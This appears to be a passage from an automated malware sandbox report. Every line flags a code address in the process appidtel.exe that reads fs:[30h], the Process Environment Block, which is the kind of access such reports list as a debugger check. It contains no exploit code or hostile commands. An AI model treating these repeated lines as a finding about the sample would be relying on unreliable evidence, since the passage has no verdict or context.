Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC188 mov eax, dword ptr fs:[00000030h]	10_2_039BC188
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC188 mov eax, dword ptr fs:[00000030h]	10_2_039BC188
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391B1B0 mov eax, dword ptr fs:[00000030h]	10_2_0391B1B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393D1D0 mov eax, dword ptr fs:[00000030h]	10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393D1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D51CB mov eax, dword ptr fs:[00000030h]	10_2_039D51CB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C61C3 mov eax, dword ptr fs:[00000030h]	10_2_039C61C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C61C3 mov eax, dword ptr fs:[00000030h]	10_2_039C61C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A71F9 mov esi, dword ptr fs:[00000030h]	10_2_039A71F9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039301F8 mov eax, dword ptr fs:[00000030h]	10_2_039301F8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D61E5 mov eax, dword ptr fs:[00000030h]	10_2_039D61E5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039051ED mov eax, dword ptr fs:[00000030h]	10_2_039051ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov ecx, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C0115 mov eax, dword ptr fs:[00000030h]	10_2_039C0115
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901131 mov eax, dword ptr fs:[00000030h]	10_2_03901131
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901131 mov eax, dword ptr fs:[00000030h]	10_2_03901131
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930124 mov eax, dword ptr fs:[00000030h]	10_2_03930124
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03998158 mov eax, dword ptr fs:[00000030h]	10_2_03998158
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907152 mov eax, dword ptr fs:[00000030h]	10_2_03907152
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906154 mov eax, dword ptr fs:[00000030h]	10_2_03906154
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906154 mov eax, dword ptr fs:[00000030h]	10_2_03906154
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5152 mov eax, dword ptr fs:[00000030h]	10_2_039D5152
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC156 mov eax, dword ptr fs:[00000030h]	10_2_038FC156
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov ecx, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03999179 mov eax, dword ptr fs:[00000030h]	10_2_03999179
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD08D mov eax, dword ptr fs:[00000030h]	10_2_038FD08D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D090 mov eax, dword ptr fs:[00000030h]	10_2_0392D090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D090 mov eax, dword ptr fs:[00000030h]	10_2_0392D090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905096 mov eax, dword ptr fs:[00000030h]	10_2_03905096
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393909C mov eax, dword ptr fs:[00000030h]	10_2_0393909C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D080 mov eax, dword ptr fs:[00000030h]	10_2_0398D080
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D080 mov eax, dword ptr fs:[00000030h]	10_2_0398D080
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390208A mov eax, dword ptr fs:[00000030h]	10_2_0390208A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C60B8 mov eax, dword ptr fs:[00000030h]	10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C60B8 mov ecx, dword ptr fs:[00000030h]	10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039980A8 mov eax, dword ptr fs:[00000030h]	10_2_039980A8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D50D9 mov eax, dword ptr fs:[00000030h]	10_2_039D50D9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039820DE mov eax, dword ptr fs:[00000030h]	10_2_039820DE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039290DB mov eax, dword ptr fs:[00000030h]	10_2_039290DB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0397D0C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0397D0C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039420F0 mov ecx, dword ptr fs:[00000030h]	10_2_039420F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA0E3 mov ecx, dword ptr fs:[00000030h]	10_2_038FA0E3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039250E4 mov eax, dword ptr fs:[00000030h]	10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039250E4 mov ecx, dword ptr fs:[00000030h]	10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039860E0 mov eax, dword ptr fs:[00000030h]	10_2_039860E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039080E9 mov eax, dword ptr fs:[00000030h]	10_2_039080E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC0F0 mov eax, dword ptr fs:[00000030h]	10_2_038FC0F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984000 mov ecx, dword ptr fs:[00000030h]	10_2_03984000
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA020 mov eax, dword ptr fs:[00000030h]	10_2_038FA020
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC020 mov eax, dword ptr fs:[00000030h]	10_2_038FC020
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03902050 mov eax, dword ptr fs:[00000030h]	10_2_03902050
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B052 mov eax, dword ptr fs:[00000030h]	10_2_0392B052
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A705E mov ebx, dword ptr fs:[00000030h]	10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A705E mov eax, dword ptr fs:[00000030h]	10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03986050 mov eax, dword ptr fs:[00000030h]	10_2_03986050
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov ecx, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392C073 mov eax, dword ptr fs:[00000030h]	10_2_0392C073
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D070 mov ecx, dword ptr fs:[00000030h]	10_2_0397D070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398106E mov eax, dword ptr fs:[00000030h]	10_2_0398106E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5060 mov eax, dword ptr fs:[00000030h]	10_2_039D5060
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF78A mov eax, dword ptr fs:[00000030h]	10_2_039BF78A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D7B0 mov eax, dword ptr fs:[00000030h]	10_2_0392D7B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D37B6 mov eax, dword ptr fs:[00000030h]	10_2_039D37B6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039897A9 mov eax, dword ptr fs:[00000030h]	10_2_039897A9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039007AF mov eax, dword ptr fs:[00000030h]	10_2_039007AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390C7C0 mov eax, dword ptr fs:[00000030h]	10_2_0390C7C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039807C3 mov eax, dword ptr fs:[00000030h]	10_2_039807C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039047FB mov eax, dword ptr fs:[00000030h]	10_2_039047FB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039047FB mov eax, dword ptr fs:[00000030h]	10_2_039047FB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390D7E0 mov ecx, dword ptr fs:[00000030h]	10_2_0390D7E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398E7E1 mov eax, dword ptr fs:[00000030h]	10_2_0398E7E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900710 mov eax, dword ptr fs:[00000030h]	10_2_03900710
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930710 mov eax, dword ptr fs:[00000030h]	10_2_03930710
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F71F mov eax, dword ptr fs:[00000030h]	10_2_0393F71F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F71F mov eax, dword ptr fs:[00000030h]	10_2_0393F71F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905702 mov eax, dword ptr fs:[00000030h]	10_2_03905702
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905702 mov eax, dword ptr fs:[00000030h]	10_2_03905702
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907703 mov eax, dword ptr fs:[00000030h]	10_2_03907703
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C700 mov eax, dword ptr fs:[00000030h]	10_2_0393C700
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397C730 mov eax, dword ptr fs:[00000030h]	10_2_0397C730
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03935734 mov eax, dword ptr fs:[00000030h]	10_2_03935734
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390973A mov eax, dword ptr fs:[00000030h]	10_2_0390973A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390973A mov eax, dword ptr fs:[00000030h]	10_2_0390973A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov eax, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov ecx, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov eax, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903720 mov eax, dword ptr fs:[00000030h]	10_2_03903720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C720 mov eax, dword ptr fs:[00000030h]	10_2_0393C720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C720 mov eax, dword ptr fs:[00000030h]	10_2_0393C720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF72E mov eax, dword ptr fs:[00000030h]	10_2_039BF72E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C972B mov eax, dword ptr fs:[00000030h]	10_2_039C972B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9730 mov eax, dword ptr fs:[00000030h]	10_2_038F9730
